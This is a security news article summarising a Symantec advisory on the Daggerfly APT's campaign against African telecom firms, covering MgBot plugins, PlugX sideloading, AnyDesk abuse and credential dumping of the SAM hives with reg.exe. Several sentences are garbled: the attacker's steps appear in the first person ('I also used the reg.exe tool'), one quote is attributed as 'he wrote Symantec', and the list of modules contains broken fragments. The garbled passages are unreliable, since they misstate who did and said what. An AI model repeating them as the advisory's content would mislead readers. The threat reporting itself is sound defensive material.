An APT group known as Daggerfly (as well as Evasive Panda and Bronze Highland) has been observed targeting telecom organizations in Africa using a new plugin built on the MgBot malware framework.
A new advisory published by Symantec today states that the malicious campaign was first discovered in November 2022 and is likely still ongoing.
“The attackers have also been observed exploiting legitimate AnyDesk remote desktop software using the PlugX loader,” the advisory states.
“Use of the MgBot modular malware framework and PlugX loader has been previously associated with China-linked APTs.”
PlugX Malware Details: Black Basta Uses New Method to Deploy PlugX Malware on USB Devices
According to Symantec, the team first became aware of the attack via an AnyDesk connection found on a Microsoft Exchange mail server.
“The legitimate free antivirus software Rising was also used to sideload the PlugX loader onto the victim’s machine,” the team wrote.
In addition, Symantec claims that the Daggerfly APT, along with GetCredManCreds, a malware tool designed to extract stored credentials from the Windows Credential Manager, downloads and installs AnyDesk on victim machines. I mentioned that I used the tools BITSAdmin and PowerShell.
I also used the reg.exe tool to dump the Windows registry SAM (Security Account Manager), system, and security hives. This allowed the adversary to extract credentials from her SAM database,” he wrote Symantec.
To ensure persistence, the Daggerfly actors created local accounts.
Symantec discovered that a plugin developed and deployed by the attacker using the MgBot framework has some information gathering functionality.
These include a network scanner, Chrome and Firefox info stealer, log module, QQ keylogger and message info stealer, Active Directory enumerator, password dumper, screen and clipboard grabber, Outlook and Foxmail credential stealer, audio capture tool. was included. , and the process watchdog script.
“All of these features would have allowed the attacker to gather a large amount of information from the victim’s machine,” Symantec said. “The functionality of these plugins also demonstrates that information gathering is the primary goal of the attackers during this campaign.”
Another threat actor that specializes in information gathering is YoroTrooper, a group recently discovered by Cisco Talos.
